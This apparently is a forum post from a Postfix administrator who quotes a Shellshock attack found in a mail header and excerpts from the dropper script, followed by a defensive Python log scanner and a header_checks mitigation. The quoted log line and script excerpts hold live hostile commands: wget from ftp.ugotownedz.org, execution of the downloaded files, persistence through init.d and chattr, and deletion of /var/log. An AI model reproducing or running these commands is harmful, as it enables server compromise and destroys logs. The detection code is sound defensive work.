Yesterday I got an email sent to {@DOMAIN.ORG from my mailserver; the mail was marked as spam.
The body included script download commands like ftp://ftp.ugotownedz.org/upfile2.sh
Lines from syslog:
Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O ... -rf /root/.bash_history; rm -rf /var/log/*"
In fact, this very simple, unencrypted shell script tries to establish a trojan. To me, it looks rather dirty, and it was unsuccessful.
But anyway, is there anything I can do to protect Postfix against those types of hacks?
From the script:
...
echo sshdo.ico >> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget ftp://$1/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file; perl /tmp/.udp/Xorg; perl /tmp/.udp/crun.d ; php /tmp/.udp/sshdo.ico; php sshdo.ico; rm -rf /tmp/.udp/sshdo.ico /tmp/.udp/crun.d /tmp/.udp/Xorg ; done
...
for file6 in $(cat /tmp/upfile); do cp /tmp/.udp/$file6 /etc/init.d/$file6;cp /tmp/.udp/$file6 /etc/init.d/$file6; chmod +x /etc/init.d/$file6; sudo update-rc.d $file6 defaults ; done
...
chattr +i /tmp/.udp/*
rm -rf /var/log/*
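One thing a defender can do with the log lines in the post is detect the attempt itself: the `message-id=() { :; }; ...` value is a shell function definition placed in a mail header, which is the shape of the attack, regardless of which payload follows. The script below is an added example (not part of the original post, and not Postfix's own tooling) that parses Postfix `smtpd`/`cleanup` log lines, correlates the queue id back to the submitting client, and reports any header value carrying that `() { ... };` prefix. The sample log lines are constructed for the example: the first three are modelled on the post's own entries with the payload replaced by a harmless echo, and the last two are a normal message for contrast; the hostname `mail.example.net` and the `192.0.2.10` address are placeholders.

```python
import re
from dataclasses import dataclass

# Postfix "cleanup" line: "<ts> <host> postfix/cleanup[<pid>]: <queueid>: message-id=<value>"
CLEANUP_RE = re.compile(
    r'^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) postfix/cleanup\[\d+\]: '
    r'(?P<qid>[0-9A-F]+): message-id=(?P<msgid>.*)$'
)

# Postfix "smtpd" line that ties a queue id to the client that submitted it
CLIENT_RE = re.compile(
    r'^\w{3} +\d{1,2} \d\d:\d\d:\d\d \S+ postfix/smtpd\[\d+\]: '
    r'(?P<qid>[0-9A-F]+): client=(?P<client>\S+)'
)

# Shape of a bash function definition used as a header value: "() {", a body,
# "}" and then ";" followed by whatever the sender wants run. A legitimate
# Message-ID never looks like this.
FUNCDEF_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# Constructed sample log (modelled on the post, payload replaced by a harmless echo)
SAMPLE_LOG = [
    'Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82]',
    'Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82]',
    'Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "echo CONSTRUCTED-EXAMPLE"',
    'Aug 14 19:30:10 hoeschen-vserv postfix/smtpd[20971]: 3C1D2DC1080: client=mail.example.net[192.0.2.10]',
    'Aug 14 19:30:11 hoeschen-vserv postfix/cleanup[20972]: 3C1D2DC1080: message-id=<20150814193011.ABC123@example.net>',
]


@dataclass
class Finding:
    queue_id: str
    client: str        # "host[ip]" as Postfix logs it, or "unknown" if not seen
    timestamp: str
    header_value: str  # the offending message-id value, kept verbatim for the report


def scan_postfix_log(lines):
    """Return one Finding per cleanup line whose message-id carries a shell function definition."""
    clients = {}   # queue id -> submitting client, learned from smtpd lines
    findings = []
    for line in lines:
        m = CLIENT_RE.match(line)
        if m:
            clients[m.group('qid')] = m.group('client')
            continue
        m = CLEANUP_RE.match(line)
        if m and FUNCDEF_RE.search(m.group('msgid')):
            findings.append(Finding(
                queue_id=m.group('qid'),
                client=clients.get(m.group('qid'), 'unknown'),
                timestamp=m.group('ts'),
                header_value=m.group('msgid'),
            ))
    return findings


if __name__ == '__main__':
    # Run over the constructed sample; point this at /var/log/mail.log for real use.
    for f in scan_postfix_log(SAMPLE_LOG):
        print(f'{f.timestamp} queue={f.queue_id} client={f.client} header={f.header_value!r}')
```

Correlating on the queue id matters because the `cleanup` line that carries the header does not repeat the client address; only the earlier `smtpd` line does. The same regular expression, dropped into a Postfix `header_checks` table with a `REJECT` action, stops such messages at the SMTP stage rather than after delivery, which is the mitigation a defender would pair with this detection.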